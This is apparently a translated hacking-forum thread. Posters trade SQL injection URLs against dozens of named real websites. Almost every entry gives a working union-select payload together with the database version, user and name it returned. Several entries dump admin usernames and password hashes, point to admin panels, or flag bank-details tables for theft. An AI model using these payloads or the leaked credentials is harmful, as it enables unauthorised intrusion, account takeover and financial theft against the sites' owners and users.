Code: http://www.bdva.ru/funclub_details.phtml?id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11-- 5.0.45-log:[email protected]:bdva Code: http://ksr.infoshare.ru/lib/?div=-5+union+select+concat_ws(0x3a,user(),version(),database())-- ksrinfoshare@localhost:5.0.51a-log:h_ksr Code: http://www.greeceforyou.ru/hotels.php?id=76/**/union/**/select/**/1,concat_ws(0x3a,user(),version(),database()),3/* [email protected]:4.0.27-log:greeceforyou-ru Code: http://www.avtodirect.ru/doc.php?supplyID=-1+union+select+1,2,3,concat_ws(0x3a,version(),user(),database())/* 4.0.16-log:avtodirect@localhost:avtodirect_ru
HTML: http://www.tax.vsem.com.ua/index.php?page=news.html&idnn=2432+union+select+1,2,3,4,concat_ws%280x3a,unhex%28hex%28version%28%29%29%29,unhex%28hex%28user%28%29%29%29,unhex%28hex%28database%28%29%29%29%29+from+information_schema.tables-- 5.0.18-nt-log:[email protected]:1gbua_seren HTML: http://www.jamescourtney.com.au/media/news?id=4+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5-- 5.0.81-community:jamescou_jamesco@localhost:jamescou_shockcustom HTML: http://www.gpstuner.com/en/news?id=99999+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 5.1.35-log:gpstuner@localhost:gpstuner HTML: http://linvo.org/?page=news&id=99999+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5-- 5.0.32-Debian_7etch11-log:linvo@localhost:linvo
http://www.olimpia-auto.com.ua/news.php?mid=news&nid=-4+union+select+1,2,group_concat(0x0b,oa_login,0x3a,oa_pswd_md5,0x3a,email,0x3a,def_discount),4+from+oa_users MySQL 5.0.81-log there are also interesting tables bank_rekvizit carts, I think it's clear what can be found in them) http://www.olimpia-auto.com.ua/news.php?mid=news&nid=-4+union+select+1,2,group_concat(0x0b,id_br,0x3a,bk_name,0x3a,rekvizit,0x3a,schet,0x3a,name,0x3a,nal),4+from+bank_rekvizit ============================ http://www.wismamerdeka.com/shop_info.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(0x0b,username,0x3a,password),14,15,16,17,18,19,20,21,22+from+_user MySQL5.0.51b-community-nt http://www.wismamerdeka.com/admin.php P.S. Somehow I'm lucky with SQL injections today, wish it were like that with everything)
medpipe.ru - - - http://www.medpipe.ru/main/index.html?id=1&nid=9/**/and/**/1=7/**/union/**/all/**/select/**/1,2,3,version(),5,6 version - 5.0.51a-24+lenny2-log user - medpipe_ru@localhost database - medpipe_ru os - debian-linux-gnu table - user - (user_login, user_password) http://www.medpipe.ru/main/index.html?id=1&nid=9/**/and/**/1=7/**/union/**/all/**/select/**/1,2,3,concat(user_login,0x3a3a3a,user_password),5,6/**/from/**/sys_users/**/limit/**/1,1
http://season-logistics.com/news_show.php?showlei=&Leiid=2&n=1&id=-5+union+select+1,2,3,group_concat(0x0b,column_name),5,6,7+from+information_schema.columns+where+table_name=0x666b5f61646d696e fk_admin::name,Password MySQL 5.0.81-community-log http://season-logistics.com/news_show.php?showlei=&Leiid=2&n=1&id=-5+union+select+1,group_concat(0x0b,name,0x3a,password),3,4,5,6,7+from+fk_admin
INSTITUTE FOR MEDICAL RESEARCH AND OCCUPATIONAL HEALTH: Code: http://www.imi.hr/stranica.php?id=11+union+select+1,2,3-- Version: 5.0.51a-24+lenny2 Database: imi@localhost User: imi
http://www.medialine.eu/sezioni.php?m=79&mm=97&mmm=72&id=27+UNION+SELECT+concat_ws(0x3a,version(),user(),database(),@@version_compile_os),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56/* Database Version: 4.1.22-standard-log Database name: medialine_eu_medialine User name: [email protected] Os: pc-linux-gnu
Code: http://hmm3.fclan.ru/redir.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16 5.0.45:us1204h@localhost:db1204a Code: http://g-tuning.ru/models/model/?mark=10&model=-112+union+select+concat_ws(0x3a,version(),user(),database()) 5.0.67:u2039@localhost:gtuningru
Construction company "НЭП": Code: http://www.sk-nep.ru/files.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10-- Version: 5.0.45 Database: sk-nep_main User: db_sk-nep@localhost
http://www.excelsoft.co.id/read_news.php?id=-44+union+select+1,2,group_concat(0x0b,name,0x3a,passw),4,5+from+admin MySQL 5.0.51a-log ============================= http://santafe-club.ru/view_page.php?id=-45+union+select+1,group_concat(0x0b,column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.columns+where+table_name=0x70687062625f7573657273 http://santafe-club.ru/view_page.php?id=-45+union+select+1,group_concat(0x0b,user_id,0x3a,username,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+phpbb_users MySQL 5.0.77-log we log in to the forum
http://www.ior.ro/produse/index.php?kCtg=6&ID=-50+UNION+SELECT+1,2,3,4,convert(concat_ws(0x3a,version(),database(),user(),@@version_compile_os)+using+latin1),6,7,8,9,10-- Database Version: 4.1.11-Debian_4sarge7-log Database name: dbior User name: ior@localhost Os: pc-linux-gnu
http://www.cilvekaekologija.lv/index.html?id=1/**/and/**/1=2/**/union/**/all/**/select/**/1,2,unhex(hex(version())),4,5,6,7,8,9/* version - 4.1.14 user - avestl@localhost database - cilveko
www.euroasiasemiconductor.com/magazine.php?id=45+union+select+1,group_concat(0x0b,user_id,0x3a,name,0x3a,password,0x3a,email),3,4,5,6,7+from+cieh_users&date=2007-02-03 MySQL 5.0.45
http://www.farmavet.ro/prez_produs.php?id=-76+UNION+SELECT+1,2,3,cast(concat_ws(0x3a,version(),database(),user(),@@version_compile_os)+as+binary),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61-- Database Version: 4.1.11-nt Database name: farmavet User name: ifarmavet@localhost Os: win32
Code: http://vetka.server.by/?id=-3+union+select+1,concat_ws(0x3a,version(),user(),database())-- 4.1.22:vetka@localhost:vetka Code: http://www.radiozavod.com/?prod=-16+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4-- 5.0.81-community:radio_radio@localhost:radio_radio Code: http://klinok-blade.ru/rubrikator/index.php?id=999999+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6-- 5.0.67-log:[email protected]:u82142 Code: http://www.kon-tiki.com.ua/index.php?w=country&lang=ru&id=-6+union+select+1,concat_ws(0x3a,version(),user(),database()),3-- 5.0.45-log:[email protected]:kontiki Code: http://rock.aplus.by/providers/?id=-9+union+select+concat_ws(0x3a,version(),user(),database()),2,3-- 5.0.32- Debian_7etch11:rockaplusby@localhost:rockaplusby Code: http://www.almaz-pk.ru/articles?id=99999+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5-- 5.0.82-log:[email protected]:almazpk_tmp Code: http://www.elitstroymaterials.ru/inside.html?action=news&id=-5+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6-- 5.0.77:elitstro_elit@localhost:elitstro_elit
2pelligrim, I posted the SQL injection on santafe-club.Ru on the previous page http://www.solitaire-labs.com/article_show.php?id=-5+union+select+1,2,group_concat(0x0b,column_name),4,5,6,7,8+from+information_schema.columns+where+table_name=0x61646d696e75736572 MySQL 5.0.81-community http://www.solitaire-labs.com/article_show.php?id=-5+union+select+1,2,group_concat(0x0b,adminuser,0x3a,password,0x3a,level),4,5,6,7,8+from+adminuser admin panel http://www.solitaire-labs.com/admin ============================== http://serbianbaseball.org/view_news.php?id=-4+union+select+1,group_concat(0x0b,id,0x3a,user,0x3a,pass),3,4+from+admin MySQL 5.0.81-community ============================== Foreign web hosting www.risingnet.net/news_info.php?id=-4+union+select+1,2,table_name,4,5,6,7+from+information_schema.tables+limit+28,1 MySQL 5.0.45 http://www.risingnet.net/news_info.php?id=-4+union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+where+table_name=0x757365725f6163636f756e74+limit+32,1 interesting tables user_account, user_webinfo; I think one could kill some time and take it to its logical conclusion, I didn't have the desire
Store «Деревянный Рай»: Code: http://www.pskovles.ru/tovar.php?id=-1+union+select+1,2,3/* Version: 4.1.22-log Database: konkurent_svoi User: konkurent_svoi@localhost
http://greenstreetprop.com/view_users.php?id=-4+union+select+1,column_name,3+from+information_schema.columns+where+table_name=0x64656661756c745f557365724442-- interesting tables: default_UserDB::ID:user_name:email_Address:user_password:isAdmin default_UserDBElements default_memberFormElements default_userFavoriteListings default_userFormElements default_userImages default_userSavedSearches I'll be hammering on default_UserDB http://greenstreetprop.com/view_users.php?id=-4+union+select+1,concat_ws(0x3a,user_name,0x3a,user_password),3+from+default_UserDB-- the admin hash is found just fine in public databases admin panel: http://greenstreetprop.com/admin MySQL 5.0.82sp 1 conveniently, it outputs all rows at once, no need to play with limits and group_concat. blind
[email protected]:u15468:5.0.67-log if this one is a repost too, then explain to me how you determine the degree of repostness? I specifically checked all the keywords in search, it's not there.